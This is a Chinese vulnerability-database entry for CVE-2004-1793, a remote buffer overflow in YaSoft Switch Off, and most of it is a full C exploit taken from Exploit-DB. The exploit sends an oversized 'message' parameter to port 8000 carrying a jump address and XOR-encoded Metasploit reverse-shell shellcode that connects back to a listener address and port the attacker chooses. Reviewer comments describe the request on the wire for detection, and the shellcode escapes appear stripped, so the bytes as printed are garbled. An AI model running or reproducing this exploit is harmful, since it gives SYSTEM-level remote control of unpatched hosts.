YaSoft Switch SendMsg远程缓冲区溢出漏洞

YaSoft Switch SendMsg远程缓冲区溢出漏洞

漏洞ID 1107609 漏洞类型 边界条件错误
发布时间 2004-01-02 更新时间 2005-10-20
CVE编号 CVE-2004-1793
CNNVD-ID CNNVD-200412-1166
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23509
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1166
|漏洞详情
SwitchOff是一款简单易用的托盘式系统工具,可自动执行经常使用的操作,如关闭或重启动计算机、关闭拨号连接等。SwitchOff不能正确处理用户提交的消息请求,远程攻击者可以利用这个漏洞使服务程序发生缓冲区溢出,精心构造的数据可能以SYSTEM进程权限在系统上执行任意指令。问题存在于action.htm脚本中:由于对用户提交给'message'参数的数据缺少正确的缓冲区边界检查,提交超长字符串作为此参数的值即可触发缓冲区溢出,可能以SYSTEM进程权限在系统上执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/9340/info

A vulnerability has been identified in the YaSoft Switch Off software package when handling message requests. The buffer overrun condition exists in the 'swnet.dll' module of the software due to insufficient bounds checking performed by the affected component. The overflow may be caused by sending an excessively long 'message' parameter to the application. This may make it possible for a remote user to execute arbitrary code through a vulnerable server.

/*******************************************************************/
/* [Crpt] Switch Off 2.3 exploit by MrNice [Crpt] */
/* --------------------------------------------------------------- */
/* */
/* Coder : MrNice */
/* Released on : 07/01/2004 */
/* Tested on : 2k Sp0 & Xp sp0 */
/* Advisory : www.securiteam.com/windowsntfocus/5BP011FBPI.html*/
/* Tech : The overflow can be caused by supplying an overly*/
/* long 'message' parameter to the application. */
/* */
/* If a password has been set, you will have to have*/
/* logged in to the server before issuing a */
/* malicious request to cause the overflow. */
/*******************************************************************/
/* www.coromputer.net && #coromputer on underet */
/******C***O***R***O***M***P***U***T***E***R*****2***0***0***4******/

#ifdef _WIN32
#include <winsock.h>
#include <windows.h>
#define close closesocket
#pragma comment (lib,"ws2_32")
#else
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Per-target 4-byte constants. main() copies one of them over
 * BadString[256..259]; the optional fourth command-line argument picks which
 * (0 selects the 2K value, any other value the XP value).
 * NOTE(review): the macro names suggest each is the address of a `jmp esp`
 * instruction on that OS build; the listing does not say in which module.
 * The file header records testing on "2k Sp0 & Xp sp0" only, so treat the
 * values as build-specific.
 * NOTE(review): string escapes throughout this listing look altered by page
 * extraction, so the literal bytes shown here are not authoritative.
 */
// Earlier values kept by the author, tagged "FR" (presumably French-language builds).
//#define JMP_ESP_2K "x1FxE5xC7x77" //2k sp0 FR
//#define JMP_ESP_XP "xE7x80x9Cx71" //xp pro sp0 FR

#define JMP_ESP_2K "xB8x64x75x71"
#define JMP_ESP_XP "xC1x1Cx35x77"


/*
 * Payload buffer that main() copies into the request string. Per the
 * author's inline comments it is a short "dexorer" stub followed by a reverse
 * shell taken from Metasploit.
 * It is deliberately not const: set_sc() overwrites bytes 182-185 and 189-190
 * in place with the listener address and port, each XORed with 0x96.
 */
char ReversShell[]= //Dexorer without call (ff..) coded by MrNice
"x83xECx50xD9xE1xD9x34x24x5Bx5Bx5Bx5Bx80xEBxE7x33"
"xC9x66x81xC1x4Fx01x80x33x96x43xE2xFA"
//Reverse Shell from Metasploit
"x7exa6x96x96x96xd5xdbxd2x96x71xefx50xefx7ax6fx3c"
"xf6x4fx9fx63x3bx5dx7bx6axadx18xd8x98x7axe8x4ex74"
"xe5x3bx4fx93x58xe4x68x25x80xc1xc5xa4xc9xa5xa4xb8"
"xd2xdaxdax96x97xcdxc2x1fx73x1fxcbx96xfcxa6xcfxf2"
"x1dx97x1dxd6x9ax1dxe6x8ax3bx1dxcex9ex7dx9ax1bxc1"
"xb2xc7xc4x69x46x1fx55xcfx7dx86xfcx9exc8x97x78xfc"
"x9excfx1dxebx96x16x6fx92xe2x72xc7xc5x69xa2x19x7e"
"x15x96x96x96xcfx1fx92x18x74x7dxa7x69xf0x17x7ax06"
"x97xc2xfex97x97x96x96x69xc3x8exc1xc1xc1xc1xd1xc1"
"xd1xc1x69xc3x82x1fx55xa7x69xfex56x3ex96x61xfex94"
"x96xb4x87x1fx77xfcx86xc7xc5x69xc3x86x13x56xe3xd2"
"x1bxaaxb2xa7x56xfcx83xcfx65x3dx50xd2xb2x86xd2x68"
"xd2xb2xabx1fxcaxb2xdex1fxcaxb2xdax1fxcaxb2xc6x1b"
"xd2xb2x86xc2xc6xc7xc7xc7xd7xc7xdfxc7xc7x69xe3x96"
"xc7x69xc3xbex1fx77xfex69x69x69x69x69xa7x69xc3xb2"
"xc1x69xc3x9ax69xc3xb6xc5xc3xc0xc1x1dxfaxb2x8ex1d"
"xd3xaax1dxc2x93xeex97x7cx1dxdcx8ex1dxccxb6x97x7d"
"x75xa4xdfx1dxa2x1dx97x78xa7x69x6axa7x56x3axaex76"
"xe2x91x57x59x9bx97x51x7dx64xadxeaxb2x82xe3x77x1d"
"xccxb2x97x7dxf0x1dx9axddx1dxccx8ax97x7dx1dx92x1d"
"x97x7ex7dx94xa7x56x1fx7cxc9xc8xcbxcdx54x9ex96";

  
/*
 * Writes the listener address and port into the payload buffer
 * (coded by Kralor[crpt]).
 *
 * rhost     IPv4 address string handed to inet_addr(). The result is not
 *           checked, so a string inet_addr() rejects is written as whatever
 *           error value it returned.
 * rport     listener port; converted to network byte order with htons().
 * shellc0de buffer to patch. Bytes 182-185 and 189-190 are overwritten; the
 *           function takes no length, so the caller must supply at least 191
 *           bytes.
 *
 * Every written byte is XORed with 0x96.
 * NOTE(review): presumably 0x96 is the key the payload's decoder stub
 * uses -- confirm against the stub.
 */
void set_sc(char *rhost, int rport, char *shellc0de)
   {
  unsigned int ip=0;
  unsigned short port=0;
  // The "" initialisers are placeholders; both pointers are reassigned before use.
  char *port_to_shell="",*ip1="";

  // View the 32-bit address byte by byte, in the order inet_addr() stored it.
  ip = inet_addr(rhost); ip1 = (char*)&ip;
  shellc0de[182]=ip1[0]^0x96;shellc0de[183]=ip1[1]^0x96;
  shellc0de[184]=ip1[2]^0x96; shellc0de[185]=ip1[3]^0x96;

  // Same treatment for the 16-bit port after conversion to network order.
  port = htons(rport);
  port_to_shell = (char *) &port;
  shellc0de[189]=port_to_shell[0]^0x96;
  shellc0de[190]=port_to_shell[1]^0x96;

   }

/* Print the tool's three banner lines to stdout, in order. */
void banner()
   {
  static const char *const banner_lines[] = {
    "nt [Crpt] Switch Off 2.3 Remote Exploit by MrNice [Crpt]n",
    "tt www.coromputer.net && Undernet #coromputern",
    "t---------------------------------------------------------------nn"
  };
  size_t idx;

  /* None of the lines contains a conversion, so fputs emits the same bytes. */
  for(idx=0;idx<sizeof(banner_lines)/sizeof(banner_lines[0]);idx++)
     {
    fputs(banner_lines[idx],stdout);
     }
   }
   
/*
 * Print the banner lines followed by the command-line syntax, then terminate
 * the process with exit(-1). Never returns to the caller.
 *
 * exe  program name shown in the syntax line (main() passes argv[0]).
 */
void usage(char *exe)
   {
  /* Same three lines banner() prints. */
  fputs("nt [Crpt] Switch Off 2.3 Remote Exploit by MrNice [Crpt]n",stdout);
  fputs("tt www.coromputer.net && Undernet #coromputern",stdout);
  fputs("t---------------------------------------------------------------nn",stdout);

  /* "cible" is the author's word for the target OS selector. */
  printf("Syntax : %s <ip_vulnerable> <your_ip> <listening_port> <cible>n",exe);
  fputs("nCible : t0 - Windows 2000 (default)n",stdout);
  fputs("tt1 - Windows Xpnn",stdout);

  exit (-1);
   }
   
/*
 * Entry point of the proof-of-concept for the 'message' parameter overflow
 * described in the file header.
 *
 * argv[1]  host running the Switch Off server; the port is fixed at 8000
 * argv[2]  IPv4 address written into the payload by set_sc()
 * argv[3]  port written into the payload by set_sc()
 * argv[4]  optional target selector ("cible"): 0 = Windows 2000 (default),
 *          any other value = Windows XP
 *
 * Returns 0 once the request has been sent; every failure path calls exit(-1).
 *
 * What reaches the wire, for detection purposes: one
 * "GET /action.htm?action=SendMsg&message=..." request to TCP 8000 whose
 * message value starts with 256 bytes of 0x90 filler and which carries the
 * hard-coded header "Host: 10.0.0.6:8000" whatever the real destination is.
 * Per the file header, a server with a password set only accepts the request
 * after login.
 */
int main(int argc, char *argv[])
{
  int hsocket;

  struct hostent *host;
    struct in_addr adresseIP;
    struct sockaddr_in adressesocket;
   
    // BadString is the value of the 'message' parameter, Request the full HTTP request.
    char BadString[700],Request[800];

  int i,len,cible=0;
  
  #ifdef _WIN32
  WSADATA wsaData;
  #endif
  
  // usage() ends in exit(-1), so execution does not continue past this branch.
  if(argc<4)
     {
       usage(argv[0]);
   }
  
  // Optional target selector; atoi() gives 0 for non-numeric text, i.e. the default.
  if(argc>4)
     {
       cible=atoi(argv[4]);
     }
     
  banner();
  
  #ifdef _WIN32
    // 0x101 requests Winsock version 1.1.
    if(WSAStartup(0x101,&wsaData))
     {
    printf("[-] Unable to load winsockn");
                exit (-1);
     }
  else
     {
       printf("[+] Winsock loadedn");
     }
  #endif

  //Create the socket
    if((hsocket=socket(AF_INET,SOCK_STREAM,0))==-1)
    {
    printf("[-] Can't creat Socketn");
    exit (-1);
    }
  else
     {
    printf("[+] Socket createdn");
     }
   
   //GetHostByName()
   if((host=gethostbyname(argv[1]))==0)
   {
   printf("[-] Can't acquire remote infon");
   close(hsocket);
   exit (-1);
   }
  else
     {
    printf("[+] Remote info Acquiredn");
     }

   // NOTE(review): adresseIP is filled here but not read again in this function.
   memcpy(&adresseIP,host->h_addr,host->h_length);
  
   //Prepare the sockaddr_in struct
   memset(&adressesocket,0,sizeof(struct sockaddr_in));
   adressesocket.sin_family=AF_INET;
   // Destination port is fixed at 8000; there is no argument to change it.
   adressesocket.sin_port=htons(8000);
   memcpy(&adressesocket.sin_addr,host->h_addr,host->h_length);

  
   if(connect(hsocket,(struct sockaddr *)&adressesocket,sizeof(struct sockaddr_in))==-1)
   {
   printf("[-] Can't connect on %s:8000n",argv[1]);
   close(hsocket);
   exit (-1);
   }
  else
     {
    printf("[+] Connected on %s:8000n",argv[1]);
     }
  
  // Patches the global ReversShell buffer in place with argv[2] / argv[3].
  set_sc(argv[2], atoi(argv[3]),ReversShell);
  // NOTE(review): argv[1] is passed but the format has no conversion for it.
  printf("[+] Reverse ShellCode builtn",argv[1]);
  
  // Fill the whole string with 0x90 first ...
  for(i=0;i<700;i++)
     {
    BadString[i]=(char)0x90;
     }
     
  // ... then copy 363 bytes of ReversShell over offsets 260..622 ...
  for(i=260;i<623;i++)
     {
    BadString[i]=ReversShell[i-260];
     }
     
  // ... and place the target-specific 4-byte constant at offsets 256..259.
  if(cible==0)
     {
    memcpy(&BadString[256],JMP_ESP_2K,4);
     }
  else
     {
       memcpy(&BadString[256],JMP_ESP_XP,4);
     }
     
  // NOTE(review): BadString has 700 elements, so index 700 is one past the
  // end of the array -- this terminator is an out-of-bounds write.
  BadString[700]=0x00;
  
  memset(Request,'x00',sizeof(Request));
  // sprintf() is unbounded: nothing here checks the result against
  // sizeof(Request). %s copies BadString up to its first zero byte.
  sprintf(Request,"GET /action.htm?action=SendMsg&message=%s HTTP/1.1rn"
      "Host: 10.0.0.6:8000rn"
      "rn",BadString);
        
  printf("[+] BadString constructedn");
  
  // A single send(); the reply is never read and the socket is not closed on
  // the success path before returning.
  if((len=send(hsocket,Request,strlen(Request),0))==-1)
      {
    printf("[-] Error on sending BadStringn");
      close(hsocket);
      exit (-1);
      }
     else
     {
     printf("[+] BadString Sended (%d)n",len);
     }
  return 0;
   }
|参考资料

来源:XF
名称:switch-off-swnet-bo(14124)
链接:http://xforce.iss.net/xforce/xfdb/14124
来源:BID
名称:9340
链接:http://www.securityfocus.com/bid/9340
来源:BUGTRAQ
名称:20040102SwitchOffMultipleVulnerabilities
链接:http://www.securityfocus.com/archive/1/348693
来源:OSVDB
名称:3309
链接:http://www.osvdb.org/3309
来源:www.elitehaven.net
链接:http://www.elitehaven.net/switchoff.txt
来源:SECTRACK
名称:1008581
链接:http://securitytracker.com/id?1008581
来源:SECUNIA
名称:10521
链接:http://secunia.com/advisories/10521
来源:NSFOCUS
名称:5877
链接:http://www.nsfocus.net/vulndb/5877
